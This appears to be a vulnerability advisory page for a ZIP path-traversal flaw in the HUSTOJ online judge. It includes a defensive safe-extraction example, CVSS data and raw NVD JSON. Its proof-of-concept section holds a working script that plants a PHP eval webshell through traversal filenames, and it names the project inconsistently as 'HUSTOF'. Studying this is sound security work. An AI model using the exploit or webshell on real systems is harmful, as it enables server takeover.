Security Vulnerability Report
CVE-2026-24479 CVSS 9.8 CRITICAL

CVE-2026-24479

Published: 2026-01-27 01:16:02
Last Modified: 2026-03-02 21:32:57

Description

HUSTOJ is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. Prior to version 26.01.24, the problem_import_qduoj.php and problem_import_hoj.php modules fail to properly sanitize filenames within uploaded ZIP archives. Attackers can craft a malicious ZIP file containing files with path traversal sequences (e.g., ../../shell.php). When extracted by the server, this allows writing files to arbitrary locations in the web root, leading to Remote Code Execution (RCE). Version 26.01.24 contains a fix for the issue.
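The defensive counterpart to the flaw described above, as an added example that is not part of this report or of the HUSTOJ code base (the project's own fix is in the referenced commit; this example is in Python rather than PHP and generalises to any ZIP import feature): every entry name is checked syntactically (no absolute path, no `..` component, no backslash or drive prefix) and then, independently, the resolved target path is checked to lie under the extraction directory before anything is written. The function names (`is_safe_entry_name`, `safe_extract`, `build_zip`, `run_demo`) and the two sample archives are constructed for this example.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path, PurePosixPath


def is_safe_entry_name(name: str) -> bool:
    """Accept a ZIP entry name only if it can never leave the extraction
    directory: non-empty, relative, no '..' component, no backslashes
    (Windows separators smuggled into a POSIX path), no NUL byte and no
    drive prefix such as 'C:'. Rejecting any ':' in the first component is
    a deliberately conservative choice for an upload feature."""
    if not name or '\\' in name or '\x00' in name:
        return False
    p = PurePosixPath(name)
    if not p.parts or p.is_absolute() or ':' in p.parts[0]:
        return False
    return '..' not in p.parts


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Extract an in-memory ZIP below dest. Every entry is validated before
    anything is written, so a hostile entry late in the archive cannot leave
    a partially extracted archive behind. Returns the entry names written and
    raises ValueError on the first unsafe entry."""
    dest_root = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
        for info in infos:
            if not is_safe_entry_name(info.filename):
                raise ValueError(f'rejected unsafe entry name: {info.filename!r}')
            # Second, independent check on the resolved path: even a name that
            # passed the syntactic test must land under dest_root.
            target = (dest_root / info.filename).resolve()
            if os.path.commonpath([str(dest_root), str(target)]) != str(dest_root):
                raise ValueError(f'entry escapes destination: {info.filename!r}')
        written = []
        for info in infos:
            if info.is_dir():
                continue
            target = dest_root / info.filename
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(info) as src, open(target, 'wb') as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def build_zip(entries: dict) -> bytes:
    """Build a ZIP in memory from {entry_name: bytes}. Test helper only:
    entry names are deliberately not validated here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def run_demo() -> dict:
    """Constructed demo: a benign problem archive is extracted, an archive
    carrying a traversal entry (the '../../shell.php' pattern from the
    advisory) is rejected, and nothing lands outside the destination."""
    dest = tempfile.mkdtemp(prefix='import-')
    benign = build_zip({'problem/1.in': b'1 2\n', 'problem/1.out': b'3\n'})
    written = safe_extract(benign, dest)
    hostile = build_zip({'../../escape.php': b'constructed marker, not a payload'})
    try:
        safe_extract(hostile, dest)
        rejected = None
    except ValueError as exc:
        rejected = str(exc)
    escaped = os.path.exists(os.path.join(dest, '..', '..', 'escape.php'))
    return {'written': written, 'rejected': rejected, 'escaped': escaped}


if __name__ == '__main__':
    print(run_demo())
```

The two checks are kept separate on purpose: the syntactic test rejects names such as `a/../b.txt` that would resolve to a harmless location but signal a crafted archive, while the resolved-path test is the backstop that holds even if the syntactic rules are later relaxed. Logging the rejected entry name, as the `ValueError` message does, gives a detection signal for upload-time traversal attempts.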

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hustoj:hustoj:*:*:*:*:*:*:*:* - VULNERABLE
HUSTOJ < 26.01.24
hustoj (affected versions of the related open-source project)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile
import os


def create_malicious_zip():
    """
    Generate malicious ZIP file for CVE-2026-24479 path traversal exploit
    Target: HUSTOF problem_import_qduoj.php or problem_import_hoj.php
    """
    # Malicious filename with path traversal sequence
    malicious_filename = '../../../../var/www/html/shell.php'
    # Webshell content - simple PHP command execution
    webshell_content = b'<?php @eval($_POST["cmd"]); ?>'
    # Create ZIP file with malicious entry
    with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(malicious_filename, webshell_content)
    print('Malicious ZIP created: exploit.zip')
    print(f'Entry name: {malicious_filename}')
    print('Upload to: /problem_import_qduoj.php or /problem_import_hoj.php')
    print('Access shell at: http://target/shell.php')


if __name__ == '__main__':
    create_malicious_zip()

References

https://github.com/zhblue/hustoj/commit/902bd09e6d0011fe89cd84d4236899314b33101f (Patch)
https://github.com/zhblue/hustoj/security/advisories/GHSA-xmgg-2rw4-7fxj (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24479", "sourceIdentifier": "[email protected]", "published": "2026-01-27T01:16:02.017", "lastModified": "2026-03-02T21:32:57.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HUSTOF is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. Prior to version 26.01.24, the problem_import_qduoj.php and problem_import_hoj.php modules fail to properly sanitize filenames within uploaded ZIP archives. Attackers can craft a malicious ZIP file containing files with path traversal sequences (e.g., ../../shell.php). When extracted by the server, this allows writing files to arbitrary locations in the web root, leading to Remote Code Execution (RCE). Version 26.01.24 contains a fix for the issue."}, {"lang": "es", "value": "HUSTOF es un juez en línea de código abierto basado en PHP/C++/MySQL/Linux para entrenamiento de ACM/ICPC y NOIP. Antes de la versión 26.01.24, los módulos problem_import_qduoj.php y problem_import_hoj.php no logran sanear correctamente los nombres de archivo dentro de los archivos ZIP subidos. Los atacantes pueden crear un archivo ZIP malicioso que contenga archivos con secuencias de salto de ruta (p. ej., ../../shell.php). Cuando es extraído por el servidor, esto permite escribir archivos en ubicaciones arbitrarias en la raíz web, lo que lleva a la Ejecución Remota de Código (RCE). La versión 26.01.24 contiene una solución para el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hustoj:hustoj:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.01.24", "matchCriteriaId": "3C2DFB45-A477-4B77-A437-C7F3C810B8B6"}]}]}], "references": [{"url": "https://github.com/zhblue/hustoj/commit/902bd09e6d0011fe89cd84d4236899314b33101f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zhblue/hustoj/security/advisories/GHSA-xmgg-2rw4-7fxj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}